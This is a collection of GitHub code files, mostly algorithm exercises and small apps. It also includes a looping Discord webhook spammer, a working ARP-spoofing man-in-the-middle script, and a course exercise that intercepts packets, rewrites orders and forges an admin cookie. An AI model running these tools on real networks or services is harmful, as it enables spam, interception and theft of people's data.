None:\n if key in self.mapping:\n index = self.mapping[key]\n value = self.array[-1]\n remove_index = self.mapping[value]\n self.array[index], self.array[remove_index] = self.array[remove_index], self.array[index]\n self.mapping[value] = index\n self.mapping[key] = remove_index\n del self.mapping[key]\n self.index -= 1\n self.array.pop()\n\n def contains(self, key: int) -> bool:\n if key in self.mapping:\n return True\n return False\n\n\nclass MyHashSet:\n\n def __init__(self):\n self.array = []\n self.index = 0\n self.dict = {}\n\n def add(self, key: int) -> None:\n self.array.append(key)\n self.dict[key] = self.index\n self.index += 1\n \n\n def remove(self, key: int) -> None:\n if key in self.dict:\n cur_index = self.dict[key]\n temp = self.array[len(self.array) - 1]\n self.array[len(self.array) - 1] = key\n self.array[cur_index] = temp\n self.dict[temp] = cur_index\n del self.dict[key]\n self.array.pop()\n self.index -= 1\n \n\n def contains(self, key: int) -> bool:\n if key in self.dict:\n return True\n return False\n\n\n# Your MyHashSet object will be instantiated and called as such:\n# obj = MyHashSet()\n# obj.add(key)\n# obj.remove(key)\n# param_3 = obj.contains(key)\n","repo_name":"Xrenya/Algorithms","sub_path":"Leetcode/Python/_705.py","file_name":"_705.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30547238768","text":"import json\r\nfrom urllib import request\r\nfrom urllib.error import HTTPError\r\n\r\n# Les paramètres d'en-tête de la requête\r\n\r\nheaders = {\r\n 'Content-Type': 'application/json',\r\n 'user-agent': 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'\r\n}\r\n\r\n# Enfin on construit notre requête\r\n\r\nurl_webhooks = (input(\"Webhooks To Destroy : \"))\r\n\r\nword_spam = (input(\"Phrase ou mot à spam :\"))\r\n\r\npayload = {'content': f\"{word_spam}\"}\r\n\r\nr = request.Request(url = url_webhooks,\r\n data=json.dumps(payload).encode('utf-8'),\r\n headers=headers,\r\n method='POST')\r\n\r\n\r\ndef send_webhook():\r\n# Puis on l'émet !\r\n try:\r\n response = request.urlopen(r)\r\n print(response.status)\r\n print(response.reason)\r\n print(response.headers)\r\n except HTTPError as e:\r\n print('ERROR')\r\n print(e.reason)\r\n print(e.hdrs)\r\n print(e.file.read())\r\nwhile True:\r\n send_webhook()","repo_name":"Prize-app/Webhook-spam","sub_path":"Webhook.py","file_name":"Webhook.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"39342008072","text":"import json\nimport os\nimport sqlite3\n\nfrom pathlib import Path\n\nimport logging\n\nlog = logging.getLogger(__name__)\n\nappnames = ['app1', 'app2', 'app3']\n\n\ndef test_root() -> Path:\n return Path(os.path.dirname(os.path.abspath(__file__)))\n\n\ndef get_demo_config():\n demo_config = Path(test_root() / Path('data/demo_config.json'))\n return json.loads(demo_config.read_text())\n\n\ndef app_sqlite_target(app_name: str) -> str:\n db_path = Path(test_root() / Path(\n f'data/lookups/{app_name}.unification_lookup.db'))\n return str(db_path.resolve())\n\n\ndef create_lookup_db(app_name: str):\n demo_config = get_demo_config()\n demo_apps = demo_config['demo_apps']\n app_conf = demo_apps[app_name]\n\n log.info(f'Create {app_name} Lookup')\n db_name = app_sqlite_target(app_name)\n\n log.info(f\"create db: {db_name}\")\n\n if os.path.exists(db_name):\n log.info(f\"{db_name} exists. Delete\")\n os.unlink(db_name)\n\n conn = sqlite3.connect(db_name)\n c = conn.cursor()\n\n c.execute('''CREATE TABLE lookup (native_id text, eos_account text)''')\n c.execute('''CREATE TABLE lookup_meta (native_table text, native_field text, field_type text)''')\n c.execute('''CREATE TABLE schema_map (sc_schema_pkey text, native_db text, native_db_platform text)''')\n c.execute('''CREATE TABLE table_maps (sc_schema_pkey text, sc_table_name text, real_table_name text, user_id_column text)''')\n\n c.execute(f\"INSERT INTO lookup_meta VALUES ('{app_conf['lookup']['lookup_meta']['native_table']}', \"\n f\"'{app_conf['lookup']['lookup_meta']['native_field']}', \"\n f\"'{app_conf['lookup']['lookup_meta']['field_type']}')\")\n\n for u in app_conf['lookup']['lookup_users']:\n c.execute(f\"INSERT INTO lookup VALUES ('{u['native_id']}', '{u['eos_account']}')\")\n\n for sc in app_conf['db_schemas']:\n c.execute(f\"INSERT INTO schema_map VALUES ('{sc['sc_schema_pkey']}', '{sc['database']}', '{sc['db_platform']}')\")\n\n for tm in sc['table_maps']:\n c.execute(\n f\"INSERT INTO table_maps VALUES ('{sc['sc_schema_pkey']}', '{tm['schema_table_id']}', \"\n f\"'{tm['db_table']}', '{tm['user_id_column']}')\")\n\n conn.commit()\n conn.close()\n\n\ndef configure_logging():\n log.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n log.addHandler(ch)\n\n\nif __name__ == \"__main__\":\n configure_logging()\n\n for app in appnames:\n create_lookup_db(app)\n","repo_name":"unification-com/haiku-node-prototype","sub_path":"test/create_lookups.py","file_name":"create_lookups.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"71799008265","text":"# Beecrowd 2322\n# Solução: Mariana Ramires\n\nn = int(input())\nsequencia = input().split()\nfalta = \"\"\n\nfor i in range(n):\n check = str(i+1)\n if check not in sequencia:\n falta = check\n\nprint(falta)","repo_name":"BRABianca/ALGPROG-I","sub_path":"ALGPROG-1/minimaratona/2322.pecaFalta.py","file_name":"2322.pecaFalta.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74693101705","text":"#!/usr/bin/env python3\n\"\"\"measure the total runtime and return it\"\"\"\nimport asyncio\n\n\nasync_comprehension = __import__('1-async_comprehension').async_comprehension\n\n\nasync def measure_runtime() -> float:\n \"\"\"measure the total runtime and return it\"\"\"\n start_time = asyncio.get_event_loop().time()\n\n tasks = [async_comprehension() for _ in range(4)]\n await asyncio.gather(*tasks)\n\n end_time = asyncio.get_event_loop().time()\n total_runtime = end_time - start_time\n\n return total_runtime\n","repo_name":"waley-code/alx-backend-python","sub_path":"0x02-python_async_comprehension/2-measure_runtime.py","file_name":"2-measure_runtime.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14640224961","text":"import sys\nfrom collections import defaultdict\n\ninput = sys.stdin.readline\nn, m, r = map(int, input().split())\ngraph = defaultdict(list)\nsys.setrecursionlimit(1000000)\n\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n\nfor i in range(n + 1):\n graph[i].sort()\n\nstack = [r]\nanswer = [0] * (n + 1)\ncount = 1\n\n\ndef dfs(answer, stack, count):\n if not stack:\n return\n pops = stack.pop()\n answer[pops] = count\n for v in graph[pops]:\n if not answer[v]:\n stack.append(v)\n dfs(answer, stack, count + 1)\n\n\ndfs(answer, stack, count)\nfor a in answer[1::]:\n print(a)\n\n\"\"\"\n5 5 1\n1 4\n1 2\n2 3\n2 4\n3 4\n\"\"\"\n","repo_name":"hugehoo/problem-solving","sub_path":"2022/2022-07/14JUL 24479.py","file_name":"14JUL 24479.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20338858067","text":"import random\n\ndef estimate_pi(n):\n inside_circle = 0\n for i in range(n):\n x = random.random()\n y = random.random()\n if x*x + y*y <= 1:\n inside_circle += 1\n \n pi_estimate = 4*inside_circle/n\n return pi_estimate\n\n# 使用10^6个点来估计圆周率\npi = estimate_pi(10**6)\nprint(f\"圆周率的估计值为: {pi:.2f}\")\n","repo_name":"nebnebuy/pyquitsolver","sub_path":"new2.py","file_name":"new2.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19755563841","text":"import itertools\nfrom sys import stdin\n\nn, m = map(int, stdin.readline().split())\ntemp_list = [[0 for _ in range(100)] for _ in range(100)]\nfor _ in range(n):\n x1, y1, x2, y2 = map(int, stdin.readline().split())\n for i, j in itertools.product(range(x1, x2+1), range(y1, y2+1)):\n temp_list[i-1][j-1] += 1\n\ncnt = 0\nfor i in range(100):\n for j in range(100):\n if temp_list[i][j] > m:\n cnt += 1\nprint(cnt)","repo_name":"kimjunsung04/baekjoon","sub_path":"06 Silver5/1531.py","file_name":"1531.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"38029425348","text":"from netfilterqueue import NetfilterQueue\nfrom scapy.all import *\nfrom scapy.all import IP\nimport json\nimport requests\nimport sys\nimport base64\n\n\n'''\n################################################################################\n\nThis File script contains solutions to the\nHomework 1 which has 4 exercises.\n\nThe names of each function has corresponds to \nthe exercise number. E .g\n\ndef ex3:\n\t\"This defines function to solve exercise3\"\n\n\nTo see the solution to each exercise , from the command\nline type:\n\n\t\t\t\t\t\tOR\n\t\tpython3 -c 'from interceptor import exercise3 ; exercise3()'\n\n\nwhere interceptor is the name of the file (ie this file) and exercise3 is the \nfunction that solves the corresponsing exercise of interest- in this case exercise 3.\n######################################################################################\n\n'''\n\n\n\ndef exercise3_call_back_function(pkt):\n\t'''\n\tThis function is used by the exercise 3 function below\n\tto get the ip packets from raw payload.\n\tThe exercise3 function recursively runs this function to solve \n\texercise 3\t\n\n\tInput : the intercepted raw payload\n\tOutput: The token and staus code\n\n\t'''\n\turl = 'http://com402.epfl.ch/hw1/ex3/shipping' # This is the url which we will use with request\n\n\tpkt.accept() # accept the packet (dont reject ot drop)\n\tpayload = pkt.get_payload() # get the payload and store in variable payload\n\tip = IP(payload) # create an IP packet from payload\n\n\n\tif ip.haslayer(TCP) == True and ip[TCP].dport == 80:\n\t\t\tassert ip[TCP].dport == 80\n\t\t\tif ip.haslayer(Raw):\n\t\t\t\t#print (ip[Raw])\n\t\t\t\thttp = ip[Raw].load.decode();\n\t\t\t\tif \"shipping\" in http:\n\t\t\t\t\tprint(\"yes\");\n\n\t\t\t\t\tdata_ = \"{\" + http.split(\"{\",1)[1] # split the payload anf extrat json.\n\t\t\t\t\t# This implies in the payload only the response starting with { is needed.\n\t\t\t\t\t# This will correspond to where the json file starts.\n\t\t\t\t\t# A \"{\" was added in the expression because when we split from \"{\" in the payload,\n\t\t\t\t\t# The bracelet \"{\"\" is excluded. But we need it to have a valid json format.\n\t\t\t\t\t# Hence, the need to add it back explicitly as \"{\" in the expression above\n\t\t\t\t\tdata = json.loads(data_) # load the new json file\n\n\t\t\t\t\tdata['shipping_address'] = 'lukman.olagoke@epfl.ch' # Here we replace the shipping address\n\n\t\t\t\t\theader = {\"User-Agent\":\"Dumb Generator\",\"Host\":\"com402.epfl.ch\",\"Content-Type\":\"application/json\",\"Content-Length\":\"91\"}\n\t\t\t\t\t# It is possible to extract the header too from payload but since the header from payload has no\n\t\t\t\t\t# \" \" double column , which is required for the request header format, this might amount to a for-loop computation\n\t\t\t\t\t# that might affect efficciency. The good thing is the header is not long so explicit declarationas above works well\n\t\t\t\t\t# to just construct a n\n\t\t\t\t\t#print (data) # Uncomment this to view data\n\n\t\t\t\t\t# Below we use the requests library to generate new packet, with the new json\n\t\t\t\t\tr = requests.post(url, data=json.dumps(data),headers=header)\n\t\t\t\t\t# The new json is response is provided as response below\n\t\t\t\t\tprint (\"The token response: \")\n\t\t\t\t\tprint (r.text)\n\t\t\t\t\t# We verify the status code is 200 = okay\n\t\t\t\t\tprint(\"\\n The status code: \")\n\t\t\t\t\tprint (r.status_code)\n\ndef exercise3():\n\n\t'''\n\tThis function recursively calls the exercise3_call_back_function.\n\tIt makes ise of the NetFilterQueue.\n\n\t'''\n\n\tnfqueue = NetfilterQueue() # create instance of NFQUEUE-- NetfilterQueue provides access to packets matched by an iptables rule in Linux\n\tnfqueue.bind(0, exercise3_call_back_function, 100) # bind nfqueue to function exercise3_call_back_function. This enables raw packets to be collected\n\t\t\t\t\t\t\t\t\t\t\t\t\t # and processed by the exercise3_call_back_function\n\n\ttry:\n\t\tnfqueue.run() # run nfqueue in try catch block\n\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\n\n\tnfqueue.unbind() # unbind nfqueue\n\tsys.exit(0)\n\ndef exercise4_call_back_function(pkt):\n\n\t'''\n\tThis function is used by the exercise 4 function below\n\tto get the ip packets from raw payload.\n\tThe exercise4 function recursively runs this function to solve \n\texercise 4\n\n\tAs part of the analysis the output of the print is piped to\n\ta text file and the sensitive data is carefully spotted.\n\n\n\n\tInput : the intercepted raw payload\n\tOutput: The token and staus code\n\t'''\n\t\n\turl = 'http://com402.epfl.ch/hw1/ex4/sensitive' # This is the url which we will use with request\n\t\n\tpkt.accept() # accept raw packet\n\tpayload = pkt.get_payload() # get the payload of raw packet\n\t#print(k)\n\tip = IP(payload) # create an ip packet\n\t\n\n\n\tif ip.haslayer(TCP) == True and ip[TCP].dport == 80:\n\t\t\tassert ip[TCP].dport == 80;\n\t\t\tif ip.haslayer(Raw):\n\t\t\t\t#print (ip[Raw])\n\t\t\t\thttp = ip[Raw].load.decode();\n\t\t\t\t#print(http.lstrip(' ')) # uncomment this to see the output. One possibility is to pipe the output to text file when this is uncommented\n\t\t\t\t# this enables carful reading of sensitive information\n\n\t# we create the new json file for the payload/sensitive data and header\n\tdata = {\"student_email\":\"lukman.olagoke@epfl.ch\",\"secrets\": [\"5370/2586/7638/8964\",\"0470.5684.7704.8295\",\"7968/7126/0501/8790\",\"W;PGR5E@SU1X>\",\"=X5AN>?YN419PA\"]}\n\n\theader = {\"User-Agent\":\"Dumb Generator\",\"Host\":\"com402.epfl.ch\",\"Content-Type\":\"application/json\",\"Content-Length\":\"452\"}\n\n\t# post a request using payload and headr\n\ttry :\n\t\tr = requests.post(url, data=json.dumps(data),headers=header)\n\t\t# The new response is provided as response below\n\t\tprint (\"The token response: \")\n\t\tprint (r.text)\n\t# We verify the status code is 200 = okay\n\t\tprint(\"\\n The status code: \")\n\t\tprint (r.status_code)\n\n\t\tprint (\"\\n\")\n\texcept KeyboardInterrupt:\n\t\t pass\n\ndef exercise4():\n\n\t'''\n\tThis function recursively calls the exercise4_call_back_function.\n\tIt makes ise of the NetFilterQueue.\n\n\n\t'''\n\n\tnsfqueue = NetfilterQueue() # create instance of NFQUEUE-- NetfilterQueue provides access to packets matched by an iptables rule in Linux\n\tnsfqueue.bind(0, exercise4_call_back_function, 100) # bind nfqueue to function exercise3_call_back_function. This enables raw packets to be collected\n\t\t\t\t\t\t\t\t\t\t\t\t\t # and processed by the exercise3_call_back_function\n\n\ttry:\n\t\tnsfqueue.run() # run nfqueue in try catch block\n\n\texcept KeyboardInterrupt:\n\t\t sys.exit(0)\n\t\t#print('') # exception\n\tnsfqueue.unbind() # unbind nfqueue\n\tsys.exit(0)\n\n\n\n\n\n\n\n\n################################ EXERCISE ONE ######################################################################\n'''\nInspecting the web page http://com402.epfl.ch/hw1/ex1, we observed that encryption was done on the client side.\n\nIn particular the dunction below does the encryption:\n\n\n\nfunction superencryption(msg,key) {\n if (key.length < msg.length) {\n var diff = msg.length - key.length;\n key += key.substring(0,diff);\n }\n\n var amsg = msg.split(\"\").map(ascii);\n var akey = key.substring(0,msg.length).split(\"\").map(ascii);\n return btoa(amsg.map(function(v,i) {\n return v ^ akey[i];\n }).map(toChar).join(\"\"));\n }\n\n\n\nMore strangely, msg = my email address = lukman.olagoke@epfl.ch and key =secureOneTimePad =Never send a human to do a machine's job\".\nThere we can run the function superencryption(msg,key) from the web console as below:\n\n>>>>>>> superencryption(\"lukman.olagoke@epfl.ch\",\"Never send a human to do a machine's job\")\nThis gives : \n>>>>>>> \"IhAdCBNOXQoCBUcOSw01CBEITFoMSA==\"\nWhich is the password to use on the webpage to enable login and get token\n>>>>>>\n\n\n\n'''\n\n\n\n\n\ndef ex2_cookies():\n cookie = 'bHVrbWFuLm9sYWdva2VAZXBmbC5jaCwxNTIwNDM3OTk2LGNvbTQwMixodzEsZXgxLHVzZXI='\n decoded = base64.b64decode(cookie)\n print(\"\\nMy cookie is \" + cookie)\n\n print(\"\\nMy decoded cookie is: \\n\")\n print(decoded)\n \n print (\"\\nChange user to administrator in the cookie decode and encode again...\");\n\n # cookie decoded is b'lukman.olagoke@epfl.ch,1520437996,com402,hw1,ex1,user'\n # change user to administrator. This becomes new cookie\n\n newCookie = b'lukman.olagoke@epfl.ch,1520437996,com402,hw1,ex1,administrator'\n print (\"\\nNew Cookie is:\" + str(newCookie))\n\n\n # Encode the new cookie and replace cookie with new cookie on browser\n print (\"\\nEncode new Cookie to get : \");\n encoded = base64.b64encode(newCookie)\n\n print(encoded)\n\n # encoded = \"bHVrbWFuLm9sYWdva2VAZXBmbC5jaCwxNTIwNDM5MTAzLGNvbTQwMixodzEsZXgxLGFkbWluaXN0cmF0b3I=\"\n\n # use the new encoded cookie in the browser \n\n\n\n\n\n","repo_name":"adderbyte/InfoPrivacy_BigData_Lab","sub_path":"Lab1_solution/interceptor.py","file_name":"interceptor.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24288673920","text":"import sys\nimport time\nimport scapy.all as scapy\nfrom optparse import *\n\"\"\"\nop = set to the ARP response, 1 = request\npdst = victim IP addr\nhwdst = victim MAC\npsrc = set the packet source IP to gateway IP addr\n\"\"\"\n\ndef get_args():\n parser = OptionParser()\n parser.add_option(\"-t\", \"--target\",help=\"define the target IP\", dest=\"target_ip\")\n parser.add_option(\"-g\", \"--gateway\",help=\"define the gateway IP\", dest=\"gateway_ip\")\n (options, args) = parser.parse_args()\n if not options.target_ip:\n parser.error(\"please specify the target ip\")\n elif not options.gateway_ip:\n parser.error(\"please specify the gateway ip\")\n else:\n return options\n\n\ndef get_mac(ip):\n arp_request = scapy.ARP(pdst=ip)\n # print(arp_request.summary())\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n # print(broadcast.summary())\n arp_broadcast = broadcast/arp_request\n # arp_broadcast.show()\n ans_list = scapy.srp(arp_broadcast, timeout=1, verbose=False)[0]\n return ans_list[0][1].hwsrc\n\n\n\"\"\"\nprint(packet.show())\nprint(packet.summary())\nsummarize the packet generate above\n\"\"\"\n\n\ndef spoof(target_ip, spoof_ip,):\n target_mac = get_mac(target_ip)\n packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)\n scapy.send(packet, verbose=False) # command change the default gateway IP to attacker MAC addr\n\n\ndef restore(dst_ip, src_ip):\n packet = scapy.ARP(op=2, pdst=dst_ip, hwdst=get_mac(dst_ip), psrc=src_ip, hwsrc=get_mac(src_ip))\n scapy.send(packet, verbose=False)\n\n\ni = 0\nkeep_looping = True\noptions = get_args()\ntry:\n while keep_looping:\n spoof(options.target_ip, options.gateway_ip)\n spoof(options.gateway_ip, options.target_ip)\n i += 2\n print(f\"\\rsending the {i} packets\", end=\"\")\n sys.stdout.flush()\n time.sleep(2)\nexcept KeyboardInterrupt:\n print(\"\\n[+] Detected CTRL + C ... Quitting.\\n\"\n \"reset the ARP table...\")\n restore(options.target_ip, options.gateway_ip)\n restore( options.gateway_ip, options.target_ip)\n\n\n","repo_name":"EEthanZZ/Hacking_Python","sub_path":"arp_spoofing.py","file_name":"arp_spoofing.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43241321576","text":"from __future__ import annotations\n\nimport typing\nimport uuid\n\nfrom tortoise import fields, models\n\nfrom guarantor.enums import Currency, DealStatus, DealType\n\nif typing.TYPE_CHECKING:\n from guarantor.db.models.dispute import Dispute\n from guarantor.db.models.user import User\n\n\nclass Deal(models.Model):\n id = fields.IntField(pk=True)\n\n title = fields.CharField(max_length=128)\n description = fields.TextField()\n\n price = fields.FloatField()\n currency = fields.CharEnumField(Currency, default=Currency.USDT)\n status = fields.CharEnumField(DealStatus, default=DealStatus.CREATED)\n deal_type = fields.CharEnumField(DealType, default=DealType.COMMON)\n\n chat_id = fields.UUIDField(default=uuid.uuid4)\n\n customer: fields.ForeignKeyRelation[User] = fields.ForeignKeyField(\n \"models.User\",\n related_name=\"deals_as_customer\",\n )\n performer: fields.ForeignKeyRelation[User] = fields.ForeignKeyField(\n \"models.User\",\n related_name=\"deals_as_performer\",\n )\n\n deadline_at = fields.DatetimeField(default=None, null=True)\n created_at = fields.DatetimeField(auto_now_add=True)\n\n dispute: fields.ReverseRelation[Dispute]\n\n class Meta:\n table = \"deals\"\n","repo_name":"ilyagod/guarantor","sub_path":"guarantor/db/models/deal.py","file_name":"deal.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12388885823","text":"from bs4 import BeautifulSoup\nimport requests\n# 发送请求\nbase_url = 'http://www.itxdl.cn/activity/teacher/teacher_lieibiao/'\nresponse = requests.get(base_url)\nresponse.encoding = response.apparent_encoding\n\nif response.status_code == 200:\n html = response.text\n # 构建bs4对象\n html = BeautifulSoup(html,'lxml')\n # 先查找到老师信息大的模块\n teacher_list = html.select('div.php_jiangshi_liebiao')\n with open('teacher.csv','w',encoding='utf-8') as f:\n for teacher in teacher_list:\n # 提取每个模块里面的一条条信息 并写入文件\n name = teacher.select('h1')[0].text.strip()\n info = teacher.select('p')[0].text\n img = teacher.select('img')[0]['src']\n item = [name,info,img]\n f.write(','.join(item)+'\\n')","repo_name":"theme716/small-routine","sub_path":"insect/6.six_day/2.兄弟连老师_bs4练习.py","file_name":"2.兄弟连老师_bs4练习.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1445341800","text":"# for all in baselines\nimport os\nimport subprocess\n\nresult = []\nos.system(\"make clean\")\nos.system(\"make\")\nfiles = [file for file in os.listdir('./contest')]\nfor i in range(len(files)):\n for j in range(i + 1, len(files)):\n player1 = files[i]\n player2 = files[j]\n print(f'\\n=== Testing {player1} vs {player2} ===')\n output = subprocess.check_output([\n # '/bin/echo',\n './build/main',\n f\"./contest/{player1}\",\n f\"./contest/{player2}\"\n ]).decode(\"utf-8\")\n if \"Player1 wins\" in output:\n result.append((player1, player2, f\"{player1}贏了 {player2}輸了\"))\n print(f\"{player1}贏了 {player2}輸了\")\n elif \"Draw\" in output:\n result.append((player1, player2, f\"{player1} {player2}平手\"))\n print(f\"{player1} {player2}平手\")\n else:\n result.append((player1, player2, f\"{player2}贏了 {player1}輸了\"))\n print(f\"{player2}贏了 {player1}輸了\")\n print()\n\n print(f'\\n=== Testing {player2} vs {player1} ===')\n output = subprocess.check_output([\n # '/bin/echo',\n './build/main',\n f\"./contest/{player2}\",\n f\"./contest/{player1}\"\n ]).decode(\"utf-8\")\n if \"Player1 wins\" in output:\n result.append((player2, player1, f\"{player2}贏了 {player1}輸了\"))\n print(f\"{player2}贏了 {player1}輸了\")\n elif \"Draw\" in output:\n result.append((player2, player1, f\"{player2} {player1}平手\"))\n print(f\"{player2} {player1}平手\")\n else:\n result.append((player2, player1, f\"{player1}贏了 {player2}輸了\"))\n print(f\"{player1}贏了 {player2}輸了\")\n print()\n\nprint('\\n=== Result ===')\nwith open(\"gamelog.txt\", \"a\") as file:\n counter = 0\n for r in sorted(result, key=lambda x: (x[0], x[1])):\n print(f'{r[0]} vs {r[1]}: {r[2]}')\n file.write(f'{r[0]} vs {r[1]}: {r[2]}\\n')\n counter += 1\n if counter % 4 == 0:\n print()\n file.write(f'\\n')\n","repo_name":"hsuan1117/I2P2-MiniChess","sub_path":"contest.py","file_name":"contest.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28714646389","text":"# Donut Bot\n# Bugs - Phone Number allows letters\n# - Name allows numbers\n# Different types of modules being imported into the code\nimport sys\n# - Importing the module of sys which is a module\n# that provides access to some objects used or\n# maintained by the interpreter\nimport random\n# - Importing the module of random which is a\n# module that is used to generate random things\nfrom random import randint\n# - From the module of random,\n# it imports the module of randint\n# which returns an integer number from a\n# specified range of numbers\n\n\n# - List of random names used at the beginning of\n# the code when starting the program and the welcome message appears\nnames = [\"Mark\", \"Phoebe\", \"Michael\", \"Denise\", \"Ellen\", \"Eric\", \"Lewis\", \"Lana\", \"Moana\", \"Sally\"]\n\n# List of donut names\n# These donut names are the different products that the\n# store has to offer for sale\ndonut_names = ['Powdered', 'Jelly', 'Strawberry Frosted', 'Blueberry Glazed',\n 'Chocolate Frosted', 'Bavarian Cream', 'Maple Frosted', 'French Cruller',\n 'Glazed', 'Apple Fritter', 'Chocolate Glazed', 'Boston Kreme']\n\n# - List of donut prices.\n# These are the prices for the different donuts\n# the store has to offer for sale\ndonut_prices = [3.50, 4.00, 4.00, 3.00, 2.50, 3.50, 5.00, 4.50, 3.00, 2.00, 4.50, 5.00]\n\n# - list to store ordered donuts. When ordering the donuts,\n# the program will append all the names of the donuts\n# which are ordered\norder_list = []\n\n# - list to store donut prices. When ordering the donuts,\n# the program will append all the costs of the donuts\n# which are ordered\norder_cost = []\n\n# - Customer details dictionary - Is a dictionary (a list)\n# which can hold customer details and has a variable name.\n# It allows the user to take information out more easily\ncustomer_details = {}\n\n# Validates inputs to check they are not blank\ndef not_blank(question):\n valid = False\n while not valid:\n response = input(question)\n if response != \"\":\n return response\n else:\n print(\"This cannot be blank\")\n \n\n# validates inputs to check if they an integer\n# takes low, high and question as parameters\n# returns input if the integer is valid\ndef val_int(low, high, question):\n while True:\n # sets up while loop\n try:\n # - the program will print the statement\n # (question) which is asking for an input\n num = int(input(question))\n # asks for input(integer)\n if num >= low and num <= high:\n # - if num is inside or equal\n # to the one of the numberic\n # boundaries, it will return num.\n return num\n else:\n # - if num is outside of the numeric boundaries\n # an error message\n print(f\"Please enter a number between {low} and {high}.\")\n except ValueError:\n # - if the input is not an integer it will go to the\n # except code and print an error message followed\n # by an instruction\n print (\"That is not a valid number.\")\n # Error Print Statement\n print(f\"Please enter a number between {low} and {high}.\")\n # Instruction print statement\n \n \n# validates string inputs to check if they are a string\n# takes question as parameter\n# returns response in title class if valid\ndef check_string(question):\n while True:\n # sets up while true loop\n response = input(question)\n # asks for input(string)\n x = response.isalpha()\n # - checks that the input is in alphabetical\n # and sets x to True if alpha\n if x is False:\n # if x is False prints error message\n print(\"Input must only contain letters.\")\n else:\n return response.title()\n # if True returns response in title class\n\n\n# Validates phone number to check if it is between 7 to 10 digits\n# takes low, high and question as parameters\n# returns input if the input is an integer and has 7 to 10 digits\ndef check_phone(question, PH_LOW, PH_HIGH):\n while True:\n # sets up while loop\n try:\n # - the program will print the statement\n # (question) which is asking for an input\n num = int(input(question))\n # asks for input(integer)\n test_num = num\n # - sets test_number to equal number which\n # allows program to pull apart the number\n # which is inputted to make sure it is a number\n count = 0\n while test_num > 0:\n # - starts another while loop where\n # test_num is bigger than 0\n test_num = test_num//10\n # - test_num is being divided by 10 to\n # split up the number\n count = count + 1\n # - since count is equal to 0,\n # every digit will be\n # counted to check the number of\n # digits that have been entered\n if count >= PH_LOW and count <= PH_HIGH:\n # - if count is inside or equal\n # to one of the numeric boundaries,\n # it will return num.\n return num\n else:\n # - if num is outside of the numeric\n # boundaries an error message\n print(\"NZ phone numbers have between 7 and 10 digits\")\n except ValueError:\n # - if the input is not an integer it will go\n # to the except code and print an error\n # message followed by an instrction\n print (\"That is not a valid number.\")\n # Error Print Statement\n print(\"Please enter a number.\")\n # Instruction print statement\n\n# Generates message with a random name\n# from the list called names and prints it out\n# No Parameters\n# No Returns\n\n\ndef welcome():\n '''\n Purpose: To generate a random name form the list and print out\n a welcome message\n Parameters: None\n Returns: None\n '''\n num = randint(0, 9)\n # - setting num to randint which returns\n # an integer number from a specified range\n # of numbers, 0 to 9 in this case\n name = (names[num])\n # - setting name to equal the list of names at the index of\n # the random numbers. Each word in a list has an index\n # number with the first one starting with 0 unless specified\n print()\n # prints blank space\n print(\"***Welcome to Dream Donut***\")\n # Print statement welcoming user to online shop with help of bot\n print(\"***My name is\", name, \"****\")\n # - Print statement which introduces the person\n # helping including the random name\n print(\"*** I will be here to help you order your delicious dream donut ***\")\n # Print statement stating what the program will help you achieve\n print()\n # prints blank space\n\n\n\n\n# Creates the option to choose either pickup or delivery\n# takes in Low, High and question as parameters when\n# sending to the validate integer input function\n# returns del_pick information at the end of the function\ndef order_type():\n del_pick = 0\n # Sets del_pick to empty\n LOW = 1\n HIGH = 2\n question = f\"Enter a number between {LOW} and {HIGH}: \"\n # - The question which asks if the user type in 1 or 2\n # depending on if they want delivery or pickup\n print(\"Is your order for Click and collect or delivery?\")\n # - Print statement which informs customer\n # they are going to have to choose between delivery and pickup\n print(\"For Click and Collect please enter 1\")\n print(\"For Delivery please enter 2\")\n delivery = val_int(LOW, HIGH, question)\n # - sets delivery to equal validate input which sends\n # input through the function of validate input which\n # checks if the input is an integer and if it fits in\n # the numeric boundaries set by low and high\n if delivery == 1:\n # If Delivery is equal to 1\n print(\"Click and Collect\")\n # - Prints statement stating Click and collect\n # to show you have chosen click and collect\n del_pick = \"click and collect\"\n # - sets del_pick to equal click and collect\n # (will be used in the order print statement function)\n click_and_collect_info()\n # Opens and runs the function called click and collect info\n else:\n # if delivery is 